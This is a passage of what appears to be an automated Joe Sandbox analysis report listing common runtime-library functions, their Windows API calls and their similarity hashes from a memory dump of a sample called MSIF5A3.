                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                              • String ID: ha
                                                                                                                                                                                                                              • API String ID: 2417226690-1151378153
                                                                                                                                                                                                                              • Opcode ID: 88e4ae768bb091ead70f396d4435d030fb0d59adc5d45857be1b68252a381ebf
                                                                                                                                                                                                                              • Instruction ID: faf0dd62e6b0ce70e55841dd30bae1b2b2bb6b941bf03f02b4f1e1daf18def27
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88e4ae768bb091ead70f396d4435d030fb0d59adc5d45857be1b68252a381ebf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A11CA3A200701AFDB189F35C8925FAB793FF84759B1D442DD94747B40D372A982C740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006176AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00614E3F,?,20001004,00000000,00000002,?,?,00614441), ref: 006176E3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2299586839-1377069549
                                                                                                                                                                                                                              • Opcode ID: accfb677b992ec8ac7586c8d7c5124403b0bb8891bb226ac269f6c0c83aec3c5
                                                                                                                                                                                                                              • Instruction ID: 7d92915bad2bf50787d691de78dd7604fa794a865d75796b98490b010817596f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: accfb677b992ec8ac7586c8d7c5124403b0bb8891bb226ac269f6c0c83aec3c5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FE04F3254961CBBCF222F61DC09EEE3E37EF44750F184024FC0565260CB318962AAD9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0060E270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                                                                              • Instruction ID: b5343778d39eb2622a86f201537e93b2e4959862903e40c3e20e2ae0bca02570
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F13071E412299FDF18CF68D8806EEB7B2FF98314F158669E815A7381D732AD01CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0060A587 Relevance: 2.8, Strings: 2, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 0$Tc
                                                                                                                                                                                                                              • API String ID: 0-2169370175
                                                                                                                                                                                                                              • Opcode ID: 3b58202df12ec60e0ae4389bd8184ca7bb63651efe7793bfbebffb2cad2b94fd
                                                                                                                                                                                                                              • Instruction ID: bb8528e385e11a2dce51b7a7e82aeb3aab01f011da65755cea8fb8116e0f519f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b58202df12ec60e0ae4389bd8184ca7bb63651efe7793bfbebffb2cad2b94fd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22C1BD749807468FCB2DCEA8C494ABFB7B3BB45380F28861DD496973D1D721AD46CB42
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00617B1F Relevance: 1.9, APIs: 1, Instructions: 410timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00617F64,00000000,00000000,00000000), ref: 00617E23
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InformationTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 565725191-0
                                                                                                                                                                                                                              • Opcode ID: 2e60ca51d429e6e2c9d8a6c8301b3ce5b0f683d96726f0f0ae3d9dd05c9ed319
                                                                                                                                                                                                                              • Instruction ID: b3bf420d681bc6a4d4197fa14ad75e9aabb3ad1f2c0d64fe2ae98882cd2331ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e60ca51d429e6e2c9d8a6c8301b3ce5b0f683d96726f0f0ae3d9dd05c9ed319
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08D11472D04215ABDB24AF64DC02AFEB7BBEF04750F58405AF901EB291E7719E81C794
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006184BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006184B8,?,?,00000008,?,?,006214E4,00000000), ref: 006186EA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                              • Opcode ID: b0f0323cef616415dacc893e0f009029c196eb4addcdc8ed0f65133ef79d2f93
                                                                                                                                                                                                                              • Instruction ID: 4f06e23b66b37d60d607ee2f82d7fddc1b6c388f36daebdd43b26049c96d97c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0f0323cef616415dacc893e0f009029c196eb4addcdc8ed0f65133ef79d2f93
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCB12C31610605DFD715CF28C486AE97BA2FF45364F298658E89ACF3A1CB35E992CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006035A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006035BF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                                              • Opcode ID: cd306ef88c5f47ed9e7cf0b82290757466e40540d7db5d1eac6a58601742d14d
                                                                                                                                                                                                                              • Instruction ID: 038d39ac327e8776805bcbc28013a7a25d57705a096ba7231ab7d48f411badac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd306ef88c5f47ed9e7cf0b82290757466e40540d7db5d1eac6a58601742d14d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4751C1B1910225CFEB19CF58E881BAABBF6FB04355F14802AD405EB390D3769E00CF90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061E48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006157CC: GetLastError.KERNEL32(?,00000008,0061AD4C,?,?,?,?,00000000,?,?), ref: 006157D0
                                                                                                                                                                                                                                • Part of subcall function 006157CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00615872
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0061E4DE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                              • Opcode ID: 551d1041b302016feceb16d5dc9d0dfe4d0a1564704fa3c15c88da73a07a8ffe
                                                                                                                                                                                                                              • Instruction ID: 19a123745a8c052dd2ea03d95a3c104b3119816620d30959a6cf11548033be70
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 551d1041b302016feceb16d5dc9d0dfe4d0a1564704fa3c15c88da73a07a8ffe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F821B372644206ABDB289A25DC42AFA77AAEF44318B18006EFD05C6281FB36ED80D754
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061E6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006157CC: GetLastError.KERNEL32(?,00000008,0061AD4C,?,?,?,?,00000000,?,?), ref: 006157D0
                                                                                                                                                                                                                                • Part of subcall function 006157CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00615872
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0061E453,00000000,00000000,?), ref: 0061E6E5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                              • Opcode ID: e12933b0fef4bb678704996cd8a59e83d5f8f8ec4a23da392c4fd6a4e7186faf
                                                                                                                                                                                                                              • Instruction ID: a3ea33a30cee7eaa1ec74284a6e160d9145c18676387738797be4c37dd417d44
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e12933b0fef4bb678704996cd8a59e83d5f8f8ec4a23da392c4fd6a4e7186faf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F0CD36600213BBEB285B64CC1ABFA77A9EB40754F1D0428EC16E32C0DA75FD81C694
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061E1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006157CC: GetLastError.KERNEL32(?,00000008,0061AD4C,?,?,?,?,00000000,?,?), ref: 006157D0
                                                                                                                                                                                                                                • Part of subcall function 006157CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00615872
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0061E48A,00000001,?,?,-00000050,?,0061E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0061E1F6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                              • Opcode ID: 7002a9201427388341821c89f508a00515d1164dcd8e45d3e15dad4c8dcebe3f
                                                                                                                                                                                                                              • Instruction ID: f6b4396f2e2a222158254c894a9de58e76516780402e6952d750189ff62a5160
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7002a9201427388341821c89f508a00515d1164dcd8e45d3e15dad4c8dcebe3f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75F028362007046FC7245F358896AEA7B96EF80728F09442CF90187680C2729C828650
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00617132 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00611C9A: EnterCriticalSection.KERNEL32(-0063DE50,?,00613576,?,0063A078,0000000C,00613841,?), ref: 00611CA9
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(Function_00037125,00000001,0063A1D8,0000000C,00617554,?), ref: 0061716A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                              • Opcode ID: 4a6083cb10b12d22b5466179f3807f97593e8f4ce17857302ccc3f4f389c289b
                                                                                                                                                                                                                              • Instruction ID: e443a6e2c3a343c75dc3d3b1b64c1e865102a84c88b74730ee6806d5e11c9988
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a6083cb10b12d22b5466179f3807f97593e8f4ce17857302ccc3f4f389c289b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FF0A972A44200EFD700DFA8E806B9D77F2FB48325F10411AF400DB2E0DB7649408F94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061E0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006157CC: GetLastError.KERNEL32(?,00000008,0061AD4C,?,?,?,?,00000000,?,?), ref: 006157D0
                                                                                                                                                                                                                                • Part of subcall function 006157CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00615872
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0061E01F,00000001,?,?,?,0061E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0061E0FD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                              • Opcode ID: d0395702093d2ea2ffdb20b07c8379b7e6a41532029879c1d618b6dd59d2f67c
                                                                                                                                                                                                                              • Instruction ID: cbdd149f745394c77418240faae71b3bb34ba7673e827b9fa1974654b1dcc31d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0395702093d2ea2ffdb20b07c8379b7e6a41532029879c1d618b6dd59d2f67c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BF0E53A30020597CB14AF35D84AAEABF96EFC1765B0E405CEE068B691C672D8D2C790
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006023F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,006000E2,00000000,00000000,00000004,005FED14,00000000,00000004,005FF127,00000000,00000000), ref: 00602410
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                              • Opcode ID: 4d311fc2a8b70f1965d60c07a7edfa50a7a77f856b6438bc1c81677c93bfafb3
                                                                                                                                                                                                                              • Instruction ID: 1cfecfa33446a1c17009ebe4cdccd8d8c3e23d239d56fd2f63abb666fb0a0367
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d311fc2a8b70f1965d60c07a7edfa50a7a77f856b6438bc1c81677c93bfafb3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E09232694106BAE7194B78DE2FFFB76DAEB01709F504151A902D41D1DAA1CA00A161
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0060353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00603077), ref: 00603544
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                              • Opcode ID: 4af56a525da7a9fc7cff0b7de7a0ca3553f67650ab08d3db550af6ccb23711cf
                                                                                                                                                                                                                              • Instruction ID: ca1a00a0be556de3d7f3ce7006b9e269a9835ef5791cf034dd0a641c6f8dbac6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4af56a525da7a9fc7cff0b7de7a0ca3553f67650ab08d3db550af6ccb23711cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00610A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
